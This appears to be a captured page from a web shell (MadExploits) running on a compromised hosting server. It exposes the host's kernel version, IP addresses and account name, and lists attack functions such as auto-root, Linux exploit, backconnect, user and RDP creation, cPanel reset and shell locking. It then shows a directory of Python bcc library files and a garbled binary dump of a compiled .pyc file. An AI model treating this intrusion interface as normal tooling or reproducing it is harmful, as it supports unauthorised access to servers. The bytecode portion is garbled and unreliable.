Linux id-dci-web1980.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
: 153.92.8.146 | : 216.73.217.84
Cant Read [ /etc/named.conf ]
8.3.30
u610877233
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
bcc /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-39.opt-1.pyc
54.16
KB
-rw-r--r--
__init__.cpython-39.pyc
54.24
KB
-rw-r--r--
containers.cpython-39.opt-1.py...
3.19
KB
-rw-r--r--
containers.cpython-39.pyc
3.19
KB
-rw-r--r--
disassembler.cpython-39.opt-1....
11.45
KB
-rw-r--r--
disassembler.cpython-39.pyc
11.45
KB
-rw-r--r--
libbcc.cpython-39.opt-1.pyc
8.74
KB
-rw-r--r--
libbcc.cpython-39.pyc
8.74
KB
-rw-r--r--
perf.cpython-39.opt-1.pyc
5.39
KB
-rw-r--r--
perf.cpython-39.pyc
5.39
KB
-rw-r--r--
syscall.cpython-39.opt-1.pyc
8.6
KB
-rw-r--r--
syscall.cpython-39.pyc
8.6
KB
-rw-r--r--
table.cpython-39.opt-1.pyc
44.49
KB
-rw-r--r--
table.cpython-39.pyc
44.49
KB
-rw-r--r--
tcp.cpython-39.opt-1.pyc
1010
B
-rw-r--r--
tcp.cpython-39.pyc
1010
B
-rw-r--r--
usdt.cpython-39.opt-1.pyc
7.75
KB
-rw-r--r--
usdt.cpython-39.pyc
7.75
KB
-rw-r--r--
utils.cpython-39.opt-1.pyc
4.35
KB
-rw-r--r--
utils.cpython-39.pyc
4.37
KB
-rw-r--r--
version.cpython-39.opt-1.pyc
160
B
-rw-r--r--
version.cpython-39.pyc
160
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.cpython-39.pyc
a u*�h� � @ s� d dl mZ d dlZd dlZd dlZd dlZd dlZd dlZd dl Z d dl Z d dlZddlm Z mZmZmZmZ ddlmZmZmZmZmZ ddlmZ ddlmZmZmZmZmZ ddl m!Z! dd l"m#Z#m$Z$ dd l%m&Z&m'Z' ze( W n e)y� e*Z(Y n0 dZ+d a,dd � Z-dZ.ej/�0e.d�Z1ej/�2e1��s4dZ1dZ3dZ4dZ5dZ6dZ7dZ8G dd� de9�Z:G dd� d�Z;G dd� d�Z<G dd� d�Z=G dd� d�Z>G d d!� d!�Z?G d"d#� d#�Z@G d$d%� d%�ZAG d&d'� d'�ZBG d(d)� d)e9�ZCdS )*� )�print_functionN� )�lib� bcc_symbol�bcc_symbol_option�bcc_stacktrace_build_id�_SYM_CB_TYPE)�Table�PerfEventArray�RingBuf�BPF_MAP_TYPE_QUEUE�BPF_MAP_TYPE_STACK)�Perf)�get_online_cpus�printb�_assert_is_bytes� ArgString� StrcmpRewrite)�__version__)�disassemble_prog� decode_map)�USDT� USDTExceptioni� c C s t S �N)�_num_open_probes� r r �0/usr/lib/python3.9/site-packages/bcc/__init__.py�_get_num_open_probes+ s r z/sys/kernel/debug�tracingz/sys/kernel/tracing� � � � � c @ s$ e Zd Zdd� Zdd� Zdd� ZdS )�SymbolCachec C s t �|t�d t�t���| _d S r )r Zbcc_symcache_new�ct�cast�POINTERr �cache)�self�pidr r r �__init__D s �zSymbolCache.__init__c C s� t � }|r"t�| j|t�|��}nt�| j|t�|��}|dk rp|jrf|jrfd|jt� |jtj �jfS d|dfS |r�|j}t� t�|�� n|j}||jt� |jtj �jfS )a� Return a tuple of the symbol (function), its offset from the beginning of the function, and the module in which it lies. For example: ("start_thread", 0x202, "/usr/lib/.../libpthread-2.24.so") If the symbol cannot be found but we know which module it is in, return the module name and the offset from the beginning of the module. If we don't even know the module, return the absolute address as the offset. r N)r r Zbcc_symcache_resolver( r% �byrefZ bcc_symcache_resolve_no_demangle�module�offsetr&